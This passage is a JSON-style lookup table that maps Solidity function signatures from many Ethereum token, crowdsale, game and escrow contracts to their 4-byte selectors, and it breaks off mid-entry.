"VirtuePokerSale()": "0xae0269aa", "contribute(uint256,uint256,uint8,bytes32,bytes32)": "0x1a069c72", "Sale(uint256,uint256,uint256,uint256,address,address,uint256,uint256,uint256,uint256,string,string,uint8)": "0x575dfc4a", "Token(uint256,string,string,uint8)": "0x6f5da839", "hasStartTimePassed(bytes32)": "0x4cb10ed3", "setStateStartTime(bytes32,uint256)": "0x67b65656", "getStateStartTime(bytes32)": "0x32cd724a", "goToNextState()": "0x289120cf", "allowFunction(bytes32,bytes4)": "0x8cea577a", "setStates(bytes32[])": "0x07153d3b", "getCurrentStateId()": "0xde4138de", "checkWhitelisted(address,uint256,uint256,uint8,bytes32,bytes32)": "0xeca001dd", "Whitelistable(address)": "0x2dd34f0f", "sendFundsToWallet()": "0x117d94f5", "beginClosingPeriod()": "0x7b0863de", "saleSuccessful()": "0x5eabe01e", "Vault(address,uint256,uint256,uint256)": "0x611cb6aa", "calcMaxWithdraw(address)": "0x250540cf", "getPlayerPayout(uint256)": "0x629bc0b4", "getPlayerFee(uint256)": "0x8a9d43e2", "getOwnerFee(uint256)": "0x352f64f9", "getBonusFee(uint256)": "0x19e5221a", "sendPayment(address,uint256)": "0x935f4c18", "advanceRound()": "0x1ba9998b", "getIsRoundOver(uint256)": "0xed5dc952", "getIsBonusUnlockExempt(uint256,address)": "0x748837b2", "getPlayerClickCount(uint256,address)": "0x4b650d0b", "getIsBonusClaimed(uint256,address)": "0x6e722fcb", "click()": "0x7d55923d", "EtherButton()": "0x15a4806c", "Divineum(uint256,string,uint8,string)": "0x75874f3e", "FAUT()": "0xea90ad7e", "sellToken()": "0x9769f0b0", "DawnX()": "0x5c908ee5", "canSpend(address,uint256)": "0x1881656b", "EtherBags()": "0xc053dc6b", "setNewSalesManager(address)": "0x776c3b70", "DepositManager(address)": "0xb2d1289b", "destroySalesManager(address)": "0x4bb017a1", "unPauseContract()": "0xbac15203", "setLev2(uint256)": "0x4a123e1d", "setLev1(uint256)": "0x581732dc", "setColdAddress(address)": "0x5e4b5f7d", "generateTokensManually(uint256,address)": "0x6a032a73", "sendTokens(uint256,uint256,address)": "0x19547404", "SalesManagerUpgradable()": "0x1c2b1e54", "updateSoftCap(uint256)": "0x01dda205", "AirEX(uint256)": "0x080b2356", "Sleipnir()": "0x0e7b8e07", "GYTToken(uint256,string,uint8,string)": "0x569bf836", "PointlessToken()": "0x5d267042", "ROY()": "0x06e91d2e", "lookupAmountUserDonatedToCampaign(address,uint256)": "0x7a6b2a2c", "lookupUserDonationHistoryByCampaignID(address)": "0xceea3914", "lookupCampaignPart2(uint256)": "0xfcd24400", "lookupCampaignPart1(uint256)": "0xd73f0b25", "lookupDonation(uint256,uint256)": "0x18cf1c25", "generalInfo()": "0x25a6c545", "returnHowMuchMoreETHNeeded(uint256)": "0x1527d657", "adjustMinimumPledgeAmount(uint256)": "0x806c6188", "contributeToCampaign(uint256)": "0x0b7ef89b", "cancelCampaign(uint256)": "0x45598b4a", "createCampaign(address,uint256,bytes32,bytes32,bytes32,bytes32)": "0x0161d5f0", "EthPledge()": "0x99fa6ed7", "mintTRCToken(address,uint256)": "0x94056c42", "TRCTotalSupply()": "0xd1900a04", "setTRCExchangeRate(uint256)": "0xa71d6f9f", "TronyCurrencyContract(uint256,uint256)": "0x90abcb08", "BunkToken()": "0x3b066dd7", "iii(address)": "0xcb2e0814", "claimBonus(address,address,uint256)": "0xedb78e36", "allocate(address,address,uint256,uint8)": "0xbd788c88", "Legolas()": "0x8835ba24", "updateBonusEligibity(address)": "0x3d30dbe9", "getLockedAmount(address,address)": "0xa7d89168", "addSomeTokens(uint256)": "0x9fcb114c", "whitelist(string)": "0x0d80bf64", "updateCeleb(uint256,string,uint256[6],uint256[6])": "0x15f17902", "createCeleb(string,uint256,address,uint256[6],uint256[6])": "0xe99a7a72", "CompetitionChainContract(uint256,string,string)": "0x71e9f016", "FoodCoinToken(uint256,string,uint8,string)": "0x707a92b8", "FIRETRADES()": "0xc9b44821", "SwapToken()": "0x14ad47eb", "SaveRickAndMorty()": "0x1082a128", "EPR()": "0x53490fbb", "SpareCurrencyToken()": "0x9f329b15", "DOCC()": "0x8aa7d975", "LATPToken()": "0x517c48c3", "HourglassV2()": "0x2be98d38", "PassTokenReborn(address)": "0xccd4020c", "RAZEN()": "0xafdcd8ec", "ETUex()": "0x095a9983", "claimConsolationPrizeLoot(uint256,address)": "0x2fd0f37e", "getConsolationPrizeTokenId(uint256,address)": "0xc9e40106", "claimLoot(uint256,address)": "0xae4a8c88", "participate(uint256,uint256,uint256,uint256,uint256,uint256)": "0xbacc2c42", "forgeWeaponRarity(uint256,uint256,uint256,uint256)": "0xdd13e20a", "setApproveFee(uint256)": "0xd32e29de", "setTakeOwnershipFeePercents(uint256)": "0xe1266042", "startCreatingAss(string,string,uint256,uint256,uint256)": "0xb76e1324", "_getId()": "0x36c8af5d", "_createAss(string,uint32,string,uint256,uint256,uint256)": "0xc6822356", "getAssesByOwner(address)": "0xc3c0198c", "getAssData(uint256)": "0xa02172d3", "getAssTotal()": "0x03dd88f8", "NOK_Omnidollar()": "0x02a2cf02", "IntegrativeWalletToken(uint256,uint256,uint256,address)": "0x6d78a434", "getLowestBid(uint8)": "0x64f4b094", "countBid(uint8)": "0xd0bec975", "getBidBySiteIndex(uint8,uint256)": "0x968f0a6a", "getBidInfo(uint32)": "0x6c9f65c5", "placeEMONTBid(address,uint8,uint256)": "0x17738cef", "placeETHBid(uint8)": "0x6518ad22", "EtheremonAdventurePresale(uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x60e036a0", "ZQCToken()": "0xfe0149a0", "createCoin()": "0x3d03ec29", "removeInvestorList(address[])": "0x9fc39549", "addInvestorList(address[])": "0xbfb9f088", "setMaximumBuy(uint256)": "0x0188fdef", "setIcoPercent(uint256)": "0x3c2d6447", "turnOffSale()": "0x23526a34", "turnOnSale()": "0xe98cf987", "SPIKE()": "0x16f60f5f", "buySPIKE()": "0xbefe6299", "updateAirdrop(address)": "0xc489a649", "turnOnTradable()": "0x2fb1746d", "BasicSPIKE()": "0x1d3e904e", "XFL(uint256,string,string)": "0x02358773", "performSetTokenControlInfo()": "0x03ca0a95", "performAddToken()": "0x1a3057f3", "getValidDurationSignatures()": "0xffcab3e9", "getValidDurationBlocksData()": "0x4fd1519c", "approveValidDurationData(uint256)": "0x3be1212b", "setValidDurationData(uint256)": "0xe9c26893", "getTokenInfoNonce()": "0xc8d172d6", "getTokenInfoSignatures()": "0x76f9b8d9", "getTokenInfoData()": "0x50ca6227", "getTokenInfoNumToknes()": "0x78b8c58c", "getControlInfoPerToken(uint256)": "0xfd56d4c8", "approveTokenControlInfo(uint256)": "0xbb78d159", "getAddTokenSignatures()": "0x6aad70b6", "getAddTokenData()": "0xf77b1856", "approveAddTokenData(uint256)": "0x70835f6b", "getDataTrackingParameters(uint256)": "0x478db7e7", "addSignature(uint256,uint256,address)": "0x6dc7d164", "addDataInstance()": "0x2a3520e1", "transferWrappedContractAdmin(address)": "0x8d7cffb7", "claimWrappedContractAdmin()": "0x010afc20", "giveTokens(address,address,uint256,string)": "0xde5cf247", "raiseCap(uint256)": "0x5410ac50", "setMigrationManager(address)": "0x025cf89f", "migrateTokens(address)": "0xc1684711", "PresaleToken(uint256,uint256)": "0xbac756e1", "buyThroughProxy(address)": "0xabd8d939", "raiseSupply(uint256)": "0x1c81ed15", "DBIPToken(uint256)": "0x5c8cb8c0", "tickerAddress()": "0xc9c08bb7", "withdrawFromTicker(uint256)": "0x24df75d9", "sendToTicker()": "0xdda0f1bb", "disableTicker()": "0xebb31418", "enableTicker()": "0x6bdee200", "attachTicker(address)": "0x3f7f9faf", "createTicker(uint256)": "0xdf7447dd", "payToManager(uint256)": "0xcf100287", "update_instant()": "0x18b322a4", "getEnabled()": "0x18de0afd", "getCentsPerETH()": "0xdbf502c0", "CMCEthereumTicker(address,uint256)": "0x40966a97", "Movieum()": "0x69f3c66e", "setmsgprcnt(uint256)": "0x32dc2a01", "setmsg(address)": "0x6dabccc9", "transferEthFromContract(address,uint256)": "0x31198d19", "receiveApproval(address,uint256)": "0x4bdf1b0e", "APIHeaven()": "0xb8bb372c", "changeSale(bool)": "0x42be9307", "changeCloudsPerEth(uint256)": "0x702c728e", "getMarriage(uint256)": "0x7e5a4dde", "sign(string,string,string,string)": "0x8ab11869", "Marriage(string,address)": "0x700e8660", "StarCoin()": "0x94eba0b5", "CloverCoin(address)": "0x5be6affc", "BetstreakToken()": "0x14d10920", "SCCCOIN()": "0x1964dcbf", "Billionstrader()": "0xdb56c29d", "WandtChain(uint256,string,uint8,string)": "0xf4f996d5", "setPeriods(uint256,uint256,uint256,uint256,uint256,uint256)": "0x28444381", "getCurrentBonusSystem()": "0x5fc4a6f3", "setBonusSystem(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x08ef59ff", "changeBonusSystem(uint256[],uint256[])": "0xd80d3025", "sendETHfromContract()": "0x54063f4e", "SimpleTokenCoin()": "0xf53b396b", "freezeToken()": "0x8ccbd6da", "setEndOfICO(uint256)": "0xb7317806", "DKS()": "0xa1d3612c", "purchaseExactWolk(uint256)": "0xee5e862f", "purchaseWolk()": "0xcc071051", "sellWolk(uint256)": "0x00310e16", "getMyAnts()": "0xc89cea99", "getMyAnthill()": "0x620b0f23", "getFreeAnthill()": "0xb59ffdd3", "calculateAntBuySimple(uint256)": "0xefd2abec", "calculateAntBuy(uint256,uint256)": "0xc7411eb4", "calculateAntSell(uint256)": "0xc781d7b0", "buyAnts()": "0x9dff78de", "sellAnts()": "0xb6a9ed31", "collectAnts(address)": "0xb6cb3777", "AnthillFarmer()": "0x6f6640c1", "CHLORINETOKEN()": "0x9a953408", "Ongo()": "0x18b15e2a", "EasyHomes()": "0x0f3092fb", "MANHATTANPROXYCNVNTAVE()": "0x2549ad8f", "EPT()": "0x3572a28e", "compareNums()": "0x53e3926c", "play(uint256,uint256,uint256)": "0xab2e5a1f", "cosmicDice()": "0xcf1d567f", "MANHATTANPROXY6THAVE()": "0x832b9eb2", "JinKuangLian()": "0x240e0b2e", "GrowGuildToken()": "0xefbf7d83", "StandardQuickConverter()": "0x668e157f", "withdrawMortgageTokens(address)": "0x16233f3f", "arbitrateC4FContract(address,uint8)": "0x335b942a", "setC4FContractStatus(address,uint8)": "0x1de473ea", "setC4FContractRequesterLock(address,bool)": "0x83a1a3aa", "setC4FContractProviderCompleted(address,bool)": "0xf3fce3b5", "setC4FContractProviderLock(address,bool)": "0x6a3b5aea", "setC4FContractProvider(address,address)": "0x496fc976", "setC4FContractOwner(address,address)": "0xf027d1f0", "getEscrowAddress(uint256)": "0x290fe2df", "getEscrowCount()": "0x16b15135", "isFavorEscrow(uint256,address)": "0x340ea558", "startFavorEscrow(uint256,uint256,uint256)": "0x4153090e", "transferWithCommission(address,uint256)": "0xec9d35aa", "getCommissionTarget()": "0xa0c96e43", "setCommissionTarget(address)": "0xe8afedd9", "setArbitrationPercentage(uint8)": "0x46f74c6d", "getWhitelistLimit(address)": "0x4b1dd21a", "whitelistAccount(address,uint256)": "0xa444502b", "setBonusDate2(uint256)": "0xfb20b70d", "setBonusDate1(uint256)": "0x626e8fd3", "setPreICOEnd(uint256)": "0x335094c2", "setICOEnd(uint256)": "0x9eccf691", "setICOStart(uint256)": "0x03e3f677", "C4FToken()": "0xd2c94ec5", "arbitrateC4FContract(uint8)": "0x3406784d", "changeTokenOffer(uint256)": "0x8b8c1177", "cancelFavor()": "0x1ff6a54b", "completeFavor()": "0x351c2576", "getTokenValue()": "0x06ffce53", "getRequesterLock()": "0x1697283a", "setRequesterLock(bool)": "0xfcf56577", "setProviderCompleted(bool)": "0x50e81a3b", "setProviderLock(bool)": "0x957563ec", "undisputeFavor()": "0x2b03d70e", "disputeFavor()": "0x4411b8f8", "changeDeadline(uint256)": "0x7aca97b5", "getProvider()": "0x483d45bd", "getRequester()": "0xcd1e0717", "C4FEscrow(address,uint256,address,uint256,uint8)": "0x490e25c1", "TowerImagesCoin()": "0x1f9ecab1", "Temgean()": "0xcf731bd7", "ContortedCoin()": "0x80f34c14", "selfKill()": "0x3ae2119b", "reclaimContributionWithInterest(address)": "0x9b828609", "returnBorroweedEth()": "0xeff02ec5", "establishBorrowerReturnFiatPerEthRate(uint256)": "0x860772a9", "reclaimContribution(address)": "0xe78686eb", "finishContributionPeriod(uint256)": "0x382db937", "enableReturnContribution()": "0x2a1cdf7a", "Lending(uint256,uint256,address,uint256,uint256,uint256)": "0x8ff6650a", "MGLTOKEN()": "0xc38a0fcb", "SphereTokenFactory()": "0x133086a5", "changeSendingBanPeriod(uint256)": "0x03228d0f", "changeCreatorBalance(uint256)": "0xf8c25c48", "ProofOfTheRich()": "0xa69364fc", "Malaysia370()": "0xc8027210", "MediChainToken(uint256)": "0xec300fcc", "BOURSETOKEN()": "0xe70e6ece", "SquirrelGims()": "0xa10874d9", "clearDeposits(address,uint256)": "0xa78036b7", "lock(bytes32,bytes32,bytes32)": "0x872588ba", "changeRestrictions()": "0x6875b6eb", "getTokePerWei()": "0x13ddd3ae", "getCalcToken()": "0x6ef4e8db", "getIncomingValueAsEth()": "0x66154885", "getWeiAmount()": "0xdc2d46f8", "defund()": "0xce749c29", "setRefundRate(uint256)": "0x100be094", "Jitech(uint256,string,uint8,string)": "0x6eebad9e", "FTV(address,address,address,address)": "0xcba66250", "getCoinAmount(uint256)": "0xb38336de", "buyCoin(address)": "0x7834a504", "sell(address,uint256,string)": "0x6d97786e", "CCASH(uint256,string,string)": "0x6c953719", "CCH_RE_2()": "0x6725bed6", "distributeCDD(address[],uint256,uint256)": "0x20c90167", "CrowdDreaming()": "0xabdbe6ca", "HellaBank()": "0xb6c78f26", "WXC()": "0x8bd56066", "AsianCapitalChain(uint256,string,uint8,string)": "0x4a2951d2", "getControlInfoMaxTotalImbalanceList()": "0x1ae0c787", "getControlInfoMaxPerBlockImbalanceList()": "0xd2aa24b6", "getControlInfoTokenlist()": "0x34fa0606", "signToResetTokenControlInfo()": "0xe7fcf520", "signToApproveTokenControlInfo()": "0x1db894fc", "setTokenInfoParametersReady()": "0xb832004d", "setTokenInfoMaxTotalImbalanceList(uint256[])": "0xaea8dcca", "setTokenInfoMaxPerBlockImbalanceList(uint256[])": "0x1bca989e", "getAddTokenResetSignatures()": "0xf05168e6", "getAddTokenApproveSignatures()": "0xf66c3af1", "getAddTokenParameters()": "0x5adc0c68", "resetAddTokenData()": "0x0f60e3d9", "signToResetAddTokenData()": "0x990dec94", "signToApproveAddTokenData()": "0x86073441", "getWrappedContract()": "0x58047913", "retrieveAssets(address)": "0x57d25a0f", "withdrawToWallet(uint256)": "0xf864ca14", "endContribution()": "0x752da85a", "getAdjustedContribution(address)": "0x20188d4f", "getAmountContributed(address)": "0xaf5b0ece", "removeKYC(address)": "0x243f6b58", "approveKYC(address)": "0x0e27324d", "recursive_read(uint256)": "0x3e9eb6c1", "recursive_store(uint32,uint256)": "0xd71eb6ab", "store(uint32)": "0xb9e95382", "Escrow(address,uint256,address)": "0x17c0b0f9", "BitcoinSinhalaToken()": "0xecacb3e0", "DoneToken()": "0xf7a0715f", "CORPayCoin()": "0xca7d18fe", "CFNDToken()": "0x4cf21f5f", "delayedTransferFrom(address,address,uint256)": "0x0f902bc2", "removeManager(address,address)": "0xf85771b2", "addManager(address,address)": "0x8513c619", "updateCertifier(address,address)": "0x9498a265", "tokenTransferByAdmin(address,uint256)": "0xf31887e6", "HIT()": "0x22372795", "_delegatecall(bytes32,uint256)": "0x363210c9", "_malloc(uint256)": "0xe8fc0780", "getTokenList()": "0x273cbaa0", "tokenBalances(address)": "0x523fba7f", "setMyTokenList(address[])": "0x4f383934", "MultiSigStub(address[],uint256)": "0x47d84bab", "Fructus()": "0x105b6f00", "bonusAmmount(uint256)": "0x2ad8aaa6", "ChangeCoinPresale()": "0x8b6bd650", "StarUniteChain(uint256,string,uint8,string)": "0xe42bb93f", "isAllowedToMint(address,address)": "0x4c85a8f3", "changeAllowanceToMint(address,address,int256)": "0x0bde1d36", "changeFreezeTransaction(string)": "0x74dfcabc", "TrustedhealthToken()": "0xcf43f4aa", "WubCoin()": "0xa12d7e2c", "BitAseanToken(uint256,string,uint8,string)": "0xb7a90cf9", "AMSBToken()": "0x75678491", "FlatEarth()": "0xb7cefd9f", "ToxbtcToken()": "0xf022a694", "getMap(address)": "0x1947bd2f", "setBytes(address,string)": "0x97bdc9cc", "setBytesRaw(string)": "0x3d2271fd", "CipherToken(uint256,string,string)": "0x6bfee863", "originBurn(uint256)": "0x55684aa6", "burnFunction(address,uint256)": "0x48d21789", "transferFunction(address,address,uint256)": "0x91cf2164", "SHIT()": "0x0e4debbc", "updAcceptDonate(bool)": "0xbdc742fc", "updAcceptAdminWithdraw(bool)": "0x9e060fb6", "balanceToken(address)": "0x04599012", "setupInfo(string,string,string)": "0x8ef5ae21", "SiliconValleyToken()": "0x7c44546e", "mintFinish()": "0x807a599c", "isFreeze(address,address)": "0x4b6bc655", "updAutoFreeze(bool)": "0x3e2fce37", "updFreezeEnabled(bool)": "0x83df7d21", "unFreeze(address,address)": "0x95c30910", "freeze(address,address)": "0x15748250", "FrozenToken()": "0x97a7804e", "isAuthorized(address,address)": "0x65e4ad9e", "unAuthorized(address,address)": "0x2a8587f9", "PACCOIN(uint256,string,string)": "0x122366fd", "setupFundingTime(uint256,uint256,uint256)": "0x509f0fe4", "setupFundingRate(uint256,uint256)": "0xfd467473", "commonWithdraw(uint256)": "0x9bb1dbea", "SpeculateCoin()": "0xe2c76bb0", "CopyrightToken(uint256,string,string)": "0xdc57c1ef", "ParrotCoin()": "0x6a8141a1", "admin_transfer(address,address,uint256)": "0x7451bf71", "admin_setAdmin(address,bool)": "0x829923bf", "TTC(uint256,string,uint8,string)": "0x7ae5dfe5", "_verifyAvailability(uint256)": "0x44f7335b", "changeVaultWallet(address)": "0xc6567835", "resumeSale()": "0x33e364cb", "haltSale()": "0x5fbaa390", "extendSale(uint256)": "0x1f1886e4", "changeMinimumWei(uint256)": "0x7c6db9b5", "recoverSigner(bytes32,bytes)": "0x97aba7f9", "splitSignature(bytes)": "0xa7bb5803", "plainPay()": "0xeb3f2427", "receiptUsed(address,address,uint256)": "0x0c433edf", "getReceiptId(address,address,uint256)": "0xdb5d855b", "ARI()": "0x4f58704c", "incentFundAddress()": "0x18d0a7cc", "LemonsRemainingToDrop()": "0x36d10e45", "STAKEHOLDERS_POOL()": "0x7eddea21", "everyoneDisabled()": "0x03149252", "tithes()": "0xd8fe511f", "icoFinishTime()": "0xe246ddba", "crosairVoucherSoldCount()": "0x7ec8ff4f", "totalRefundedAmount()": "0xcd1e0355", "advisorsKey()": "0xf3604e54", "nextUnLockTime()": "0x88684aa5", "DELAY()": "0x69b41170", "buy50Price()": "0x5f54ae17", "lastIndex()": "0xf3f6f0d7", "tokenOfferingAddr()": "0x4d2c29a0", "minCompanyValue()": "0x386ca47e", "houseBankRoll()": "0xb45cff5f", "currentKing()": "0xf5b45714", "EarlyAdoptersAddress()": "0x4df0ca7e", "mmLibAddress()": "0x4d689543", "crowdsaleTokens()": "0x6713263d", "pubCount()": "0xa21f836e", "prizeWon()": "0x73a80336", "publisher()": "0x8c72c54e", "getDistributionFacts()": "0x8a48941f", "symbol_()": "0xaf17dea6", "inv_contract()": "0x7ccc7e94", "marketDefaultFeeLow()": "0xd380e036", "AUTH_INITCONGRESS()": "0x94dc84ca", "gameEndBlock()": "0xfadd3235", "distributionStart()": "0x7bbc101b", "_frozenTokens()": "0x803287de", "mtcDailyLimit()": "0x7058901e", "airdropNum2()": "0x2f34adb4", "operatorFeeAcct()": "0x44f5e447", "claimableRefund()": "0x5ab827f6", "RATE_SALESTAGE2()": "0xff359cb8", "affiliateTree()": "0x0bae2129", "PRICE_MULTIPLIER_PREICO2()": "0x210d2bba", "rollAddress()": "0x34057a45", "isReleasable()": "0xad9bdebb", "getWithdrawableBalance()": "0xbe788e70", "canBurnWhiteList()": "0x5a444139", "lockPercent()": "0x91030cb6", "issuingBody()": "0x3eb1eb1a", "mutagen2FaceContract()": "0xb40e415e", "StaticEthAvailable()": "0xec4baa83", "officialEmail()": "0x2fa146d8", "Worldtvcoin()": "0x9ed78489", "AVAILABLE_FOUNDER_SUPPLY()": "0x34ac6f5e", "stepOneLockEndTime()": "0x62e8b948", "uniquePetsCount()": "0x92763585", "isPresalesNotEndedInAdvance()": "0x2069f66c", "teamNum()": "0x24ca77e5", "serviceProvider()": "0x8d69e95e", "fundingMaximumTargetInUsd()": "0x8f98767e", "submitInput()": "0x9de92f7e", "burnerChangeable()": "0x57e4e95d", "basicThreshold()": "0xa9ea6454", "teamVesting4Years()": "0x29a19987", "numAdviserDeposits()": "0x0022771f", "canFinalizeEarly()": "0xb5a4e04a", "itemId()": "0xca6158cb", "CrypteloERC20Address()": "0x2a10abc3", "START_TIMESTAMP()": "0x781cd99d", "hash()": "0x09bd5a60", "kingdomFactory()": "0x1b82f68f", "PriceWeekThree()": "0x7cba3f04", "BTL_ATHENIAN()": "0x8297d46d", "VOLUME_5()": "0x3e49776b", "currentAmount()": "0xf441b1c8", "addcoinslimit()": "0x1ddd39cc", "final_shares_sold()": "0x50a0f733", "candidat()": "0x6e640f4c", "lastBlock_v3()": "0xe1aa60dc", "BONUS_MIN_DURATION()": "0x409c7baf", "vestingTotalPeriods()": "0x843cfb9e", "coldAdmin()": "0x05015e79", "end_now()": "0xb33c4b1f", "longLock()": "0x8d91931f", "maxCapEcosystem()": "0x47a90325", "vestingConfigured()": "0x8f152d0e", "ECO_SYSTEM_STAKE()": "0x2fb22cfa", "currentTadpoleOwner()": "0xf991a43f", "requireOnce()": "0xd1096155", "ICO_EOS_AIRDROP()": "0xcea9b7af", "coldStorage()": "0xd2d97d9f", "maxDuration()": "0x6db5c8fd", "poolTokenBalance()": "0x8c3135f2", "feeAccount2()": "0x6d736fac", "currentDiscountPercentage()": "0x0d17ace0", "defaultURIEnd()": "0x01293b5c", "isContractDeprecated()": "0x1e6090f4", "TOKEN_SUPPLY_MAINSALE_LIMIT()": "0xd3484c1c", "currentPeriodEndTimestamp()": "0x575b4071", "PRICE_STAGE_FOUR()": "0xbd8e68c9", "FEE_MIN()": "0x59c13403", "winChoice()": "0x8954f5b1", "getNeedLockFunds()": "0x068841c6", "reservedTokens()": "0x15a55347", "getHybridizationFullPrice(uint256)": "0xe8474230", "setCreateDividendPercent(uint256)": "0xe5dfbe78", "isTournament(address)": "0xe10f1b06", "setWallet(address)": "0xdeaa59df", "setSubTourFreezingTime(uint64)": "0xd4331c21", "setSubFreezingTime(uint64)": "0xcfeb9a97", "getSellUnicornFullPrice(uint256)": "0xcfa46990", "managerAddress()": "0xcf73a1bc", "locked()": "0xcf309012", "getCreateUnicornFullPriceInCandy()": "0xa2c17459", "createUnicornPrice()": "0xa15404b7", "runInit()": "0xa14e0e4e", "subFreezingTime()": "0x9ea76475", "createDividendPercent()": "0x99d413f4", "sellDividendPercent()": "0x999f4b38", "setTournament(address)": "0x993ab58e", "setOraclizeFee(uint256)": "0x95270cd1", "subTourFreezingTime()": "0x92491f21", "ownerAddress()": "0x8f84aa09", "setDividendManager(address)": "0x8bf60537", "communityAddress()": "0x86e476dd", "subFreezingPrice()": "0x73def2b7", "subTourFreezingPrice()": "0x6b308ee7", "walletAddress()": "0x6ad5b3ea", "getCreateUnicornFullPrice()": "0x6a96c63e", "setCandyPowerToken(address)": "0x691ae7c9", "setUnicornToken(address)": "0x60733572", "setBlackBox(address)": "0x600b1ff2", "unicornTokenAddress()": "0x5abaaa01", "blackBoxAddress()": "0x5550e4f3", "oraclizeFee()": "0x4c6226fc", "dividendManagerAddress()": "0x49b7a9c2", "setGeneLab(address)": "0x49ab1d86", "unregisterInit(address)": "0x47202819", "setManagerAddress(address)": "0x41431908", "createUnicornPriceInCandy()": "0x37c62ed6", "setSubFreezingPrice(uint256)": "0x35d4a49a", "setSellDividendPercent(uint256)": "0x354685fb", "setUnicornBreeding(address)": "0x338410f2", "setSubTourFreezingPrice(uint256)": "0x32f23601", "registerInit(address)": "0x2a70d1e7", "delTournament(address)": "0x25e37b2b", "geneLabAddress()": "0x1d296e8d", "setCommunity(address)": "0x15da0b02", "setCreateUnicornPrice(uint256,uint256)": "0x146483f9", "unicornBreedingAddress()": "0x07ec4b42", "transferEthersToDividendManager(uint256)": "0xff394153", "getCreateUnicornPriceInCandy()": "0xee81f57c", "setGen0Limit()": "0xec7bb2ac", "marketSize()": "0xeb56105d", "hybridizationListSize()": "0xeb1bb9d9", "gen0Limit()": "0xe515a4d1", "getEtherFeeForPriceInCandy()": "0xde763a40", "acceptHybridization(uint256,uint256)": "0xda9287d1", "gen0Step()": "0xd224c3e0", "plusTourFreezingTime(uint256)": "0xd03e9fff", "deleteHybridization(uint256)": "0xc7024b98", "blackBox()": "0xbd1723e5", "gen0Count()": "0xb30387a4", "buyUnicorn(uint256)": "0xb09b1a51", "revokeUnicorn(uint256)": "0xaf40ce20", "candyPowerToken()": "0xa76d368a", "candyToken()": "0xa63f5e2a", "unicornManagement()": "0x8dca7a01", "withdrawTokens()": "0x8d8f2adb", "createUnicorn()": "0x8d8d50d0", "gen0PresaleCount()": "0x8091fbe1", "gen0PresaleLimit()": "0x7cd022d4", "deleteOffer(uint256)": "0x74268ff2", "hybridizationList(uint256)": "0x67ae9e8f", "sellUnicorn(uint256,uint256)": "0x647151b5", "unicornToken()": "0x544447bb", "createUnicornForCandy()": "0x52fa1ac2", "setGen0Step(uint256)": "0x4ea44358", "minusTourFreezingTime(uint256)": "0x42f030e4", "createPresaleUnicorns(uint256,address)": "0x3ae50ce7", "getOfferPrice(uint256)": "0x31d03594", "getCreateUnicornPrice()": "0x317ffcf2", "cancelHybridization(uint256)": "0x2cf42a6c", "minusFreezingTime(uint256)": "0x28968872", "market(uint256)": "0x28861d22", "makeHybridization(uint256,uint256)": "0x2394a797", "getHybridizationPrice(uint256)": "0x1ed378a1", "hybridizations(uint256)": "0x1327d383", "isGamePaused()": "0x0422ddf3", "True()": "0xe9ab1bd7", "False()": "0x87d36176", "moveERC721Tokens(address,address,uint256)": "0xf7a40e99", "limitBuy(uint256)": "0xb9926d1d", "setSpread(uint256)": "0xb66a261c", "moveERC20Tokens(address,address,uint256)": "0xa15cdbf7", "calcSELLoffer(uint256)": "0x9132c26c", "limitSell(uint256,uint256)": "0x8ed6910f", "depositBoth(uint256)": "0x764c8e54", "withdrawBoth(uint256,uint256)": "0x461105c7", "moveEther(address,uint256)": "0x34eaa923", "calcBUYoffer(uint256,uint256)": "0x0ac3ccc4", "authenticate(bytes)": "0xee0d605c", "disown(bytes32,address)": "0x201745d5", "logSweep(address,address,uint256)": "0x764358e6", "teamsReward()": "0x88bb0c73", "finalizeTS()": "0x874fe370", "RESERVE_POOL_TOKENS()": "0x0a16916a", "bountyWallet()": "0xe5760520", "supplyRound4()": "0xcad7214d", "TOKENS_SALE_HARD_CAP()": "0xf946372c", "pipeIndex()": "0xe81f0154", "UTCStart()": "0x8977f909", "feePercentage()": "0xa001ecdd", "second_round_start()": "0x53c7801c", "weiLimit()": "0xbae3c27f", "walletId()": "0xc162ba2f", "carTaxiCrowdsaleAddress()": "0xbe01bc87", "secondRefundRoundRateDenominator()": "0x2c8e3ebb", "tokenCreationMinConversion()": "0x37d35507", "refundAmount()": "0xad33513f", "ethUsdPrice()": "0x9478ab8c", "CPCEPrivate()": "0x63d6519a", "remainingTokensVIPs()": "0xfd426e40", "pause2()": "0xac646756", "COLOR_NOT_AVAILABLE()": "0xa0422d02", "whiteListTime()": "0xb225e08a", "AllCaptcha()": "0x4ca5558c", "partner1_voted_update_prenup()": "0xac12f3e9", "firstChainHNw1()": "0x98f52c52", "getUpperBoundBlocksTillGameEnd()": "0xe639481a", "AMOUNT_TOKENS_FOR_SELL()": "0x1b7aad1b", "getUnpaid()": "0xadb1cd73", "getTokensPerEth()": "0x6893f63f", "totalHedgelyInvested()": "0x37d33438", "inICO()": "0xf468e9b3", "GetPrizeFund()": "0x83fcafbb", "enableRegistration()": "0xf2b9b40f", "jackPotFunds()": "0x1821cd93", "referrerBonusPercent()": "0xd2d0ded1", "week3Price()": "0xf0704f02", "disburseAddr()": "0xe7df2f3e", "transfered_total()": "0x291d4f98", "spendable_supply()": "0xc1fd2580", "dateRelease12()": "0x6b5c4b16", "currentBidNumber()": "0x29b8dab4", "executed()": "0x31a38c89", "PRIVATESALE_TOKENCAP()": "0xf0004ab4", "bovBatchDistributed()": "0x90a4d287", "totalBooty()": "0xaf10b8cf", "SALE_STAKE()": "0xf98d7c75", "reference()": "0xc65d15b9", "tokensTransferred()": "0x623eff55", "maxApenSell()": "0x7bde7fcf", "bonusTokensSold()": "0xf4a32ef8", "TEAM_MEMBER_VAL()": "0xa9cdf643", "exitOverPlayer()": "0x006e3a1d", "breedingMarket()": "0x5a390a5f", "refundPreSale()": "0x1c232194", "_ecosysSupply()": "0x5265565e", "MYTOKENNAME()": "0x5b84bb27", "mdtRewardAmount()": "0xd08d6753", "techWallet()": "0xbd484606", "MeSum()": "0xa288237c", "withdrawlEnabled()": "0xfe8252f3", "GAME_DURATION()": "0xc31b29ce", "hasFourStepWithdraw()": "0xbf05cbe6", "minTokenSale()": "0x4d3b915e", "turtlemasterReq()": "0xf68ce40b", "TIME_LOCK_END()": "0x7de50c44", "payAmount()": "0xc8705544", "midGradeHold()": "0xbfe3e03a", "receiver()": "0xf7260d3e", "activityFunds()": "0x85a156af", "feeAffiliate()": "0xfebc8c39", "isWhitelistOn()": "0x716f10bf", "betClosed()": "0xbbe18d43", "tokensCrowdsale()": "0xbfc47aa0", "RANGE_SCALE()": "0x79eb26cc", "annualPrice()": 